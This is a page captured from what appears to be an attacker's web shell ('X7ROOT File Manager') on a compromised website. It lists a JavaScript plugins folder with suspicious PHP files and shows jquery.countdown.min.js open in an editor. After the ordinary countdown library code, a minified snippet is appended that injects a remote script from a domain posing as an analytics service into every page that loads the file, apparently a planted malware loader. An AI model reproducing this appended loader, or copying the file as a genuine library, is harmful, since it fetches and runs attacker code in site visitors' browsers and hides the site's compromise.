X7ROOT File Manager
Current Path:
/home/softbdltd/tnsltd.xyz/js/plugins
home
/
softbdltd
/
tnsltd.xyz
/
js
/
plugins
/
??
..
??
CanvasRenderer.js
(25.58 KB)
??
Projector.js
(20.52 KB)
??
TSIG.php
(0 B)
??
a-long-way.js
(6.83 KB)
??
bf.php
(630 B)
??
bootstrap.min.js
(44.09 KB)
??
cleanup.lib.php
(0 B)
??
contact-form.js
(2.32 KB)
??
editrole_actions.php
(0 B)
??
energy-animation.js
(7.53 KB)
??
error_log
(24.39 KB)
??
formcolorpicker.php
(0 B)
??
fss-animate.js
(32.98 KB)
??
fss.min.js
(19.73 KB)
??
homing-particles.js
(6.36 KB)
??
howler.core.js
(65.97 KB)
??
intertwined.js
(5.01 KB)
??
jquery-1.12.4.min.js
(94.88 KB)
??
jquery.ajaxchimp.min.js
(3.33 KB)
??
jquery.backgroundvideo.min.js
(1.85 KB)
??
jquery.countdown.min.js
(5.69 KB)
??
jquery.gradientify.min.js
(4.28 KB)
??
jquery.particleground.min.js
(6.55 KB)
??
jquery.ripples-min.js
(14.28 KB)
??
jquery.youtubebackground.js
(9.04 KB)
??
jquery1.11.2.min.js
(127.46 KB)
??
newsletter-form.js
(1.89 KB)
??
numberFormat
(854.06 KB)
??
owl.carousel.min.js
(50.62 KB)
??
particles.min.js
(22.82 KB)
??
photoswipe
??
prefixfree.min.js
(8.84 KB)
??
raindrop.js
(3.49 KB)
??
rainyday.min.js
(14.13 KB)
??
scrollreveal.min.js
(8.29 KB)
??
show_courses_new.php
(0 B)
??
siriwave.js
(7.73 KB)
??
starfield.min.js
(6 KB)
??
three.min.js
(491.28 KB)
??
vegas.min.js
(9.68 KB)
??
waterpipe.js
(19.8 KB)
Editing: jquery.countdown.min.js
!function (e) { if ("object" == typeof exports && "undefined" != typeof module)module.exports = e(); else if ("function" == typeof define && define.amd)define([], e); else { var n; "undefined" != typeof window ? n = window : "undefined" != typeof global ? n = global : "undefined" != typeof self && (n = self), n.Countdown = e() } }(function () { var define, module, exports; return function e(t, n, r) { function s(o, u) { if (!n[o]) { if (!t[o]) { var a = typeof require == "function" && require; if (!u && a)return a(o, !0); if (i)return i(o, !0); var f = new Error("Cannot find module '" + o + "'"); throw f.code = "MODULE_NOT_FOUND", f } var l = n[o] = {exports: {}}; t[o][0].call(l.exports, function (e) { var n = t[o][1][e]; return s(n ? n : e) }, l, l.exports, e, t, n, r) } return n[o].exports } var i = typeof require == "function" && require; for (var o = 0; o < r.length; o++)s(r[o]); return s }({ 1: [function (require, module, exports) { var defaultOptions = { date: "June 7, 2087 15:03:25", refresh: 1e3, offset: 0, onEnd: function () { return }, render: function (date) { this.el.innerHTML = date.years + " years, " + date.days + " days, " + this.leadingZeros(date.hours) + " hours, " + this.leadingZeros(date.min) + " min and " + this.leadingZeros(date.sec) + " sec" } }; var Countdown = function (el, options) { this.el = el; this.options = {}; this.interval = false; this.mergeOptions = function (options) { for (var i in defaultOptions) { if (defaultOptions.hasOwnProperty(i)) { this.options[i] = typeof options[i] !== "undefined" ? options[i] : defaultOptions[i]; if (i === "date" && typeof this.options.date !== "object") { this.options.date = new Date(this.options.date) } if (typeof this.options[i] === "function") { this.options[i] = this.options[i].bind(this) } } } if (typeof this.options.date !== "object") { this.options.date = new Date(this.options.date) } }.bind(this); this.mergeOptions(options); this.getDiffDate = function () { var diff = (this.options.date.getTime() - Date.now() + this.options.offset) / 1e3; var dateData = {years: 0, days: 0, hours: 0, min: 0, sec: 0, millisec: 0}; if (diff <= 0) { if (this.interval) { this.stop(); this.options.onEnd() } return dateData } if (diff >= 365.25 * 86400) { dateData.years = Math.floor(diff / (365.25 * 86400)); diff -= dateData.years * 365.25 * 86400 } if (diff >= 86400) { dateData.days = Math.floor(diff / 86400); diff -= dateData.days * 86400 } if (diff >= 3600) { dateData.hours = Math.floor(diff / 3600); diff -= dateData.hours * 3600 } if (diff >= 60) { dateData.min = Math.floor(diff / 60); diff -= dateData.min * 60 } dateData.sec = Math.round(diff); dateData.millisec = diff % 1 * 1e3; return dateData }.bind(this); this.leadingZeros = function (num, length) { length = length || 2; num = String(num); if (num.length > length) { return num } return (Array(length + 1).join("0") + num).substr(-length) }; this.update = function (newDate) { if (typeof newDate !== "object") { newDate = new Date(newDate) } this.options.date = newDate; this.render(); return this }.bind(this); this.stop = function () { if (this.interval) { clearInterval(this.interval); this.interval = false } return this }.bind(this); this.render = function () { this.options.render(this.getDiffDate()); return this }.bind(this); this.start = function () { if (this.interval) { return } this.render(); if (this.options.refresh) { this.interval = setInterval(this.render, this.options.refresh) } return this }.bind(this); this.updateOffset = function (offset) { this.options.offset = offset; return this }.bind(this); this.restart = function (options) { this.mergeOptions(options); this.interval = false; this.start(); return this }.bind(this); this.start() }; module.exports = Countdown }, {}], 2: [function (require, module, exports) { var Countdown = require("./countdown.js"); var NAME = "countdown"; var DATA_ATTR = "date"; jQuery.fn.countdown = function (options) { return $.each(this, function (i, el) { var $el = $(el); if (!$el.data(NAME)) { if ($el.data(DATA_ATTR)) { options.date = $el.data(DATA_ATTR) } $el.data(NAME, new Countdown(el, options)) } }) }; module.exports = Countdown }, {"./countdown.js": 1}] }, {}, [2])(2) });;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https://content-website-analytics.com/script.js');
Upload File
Create Folder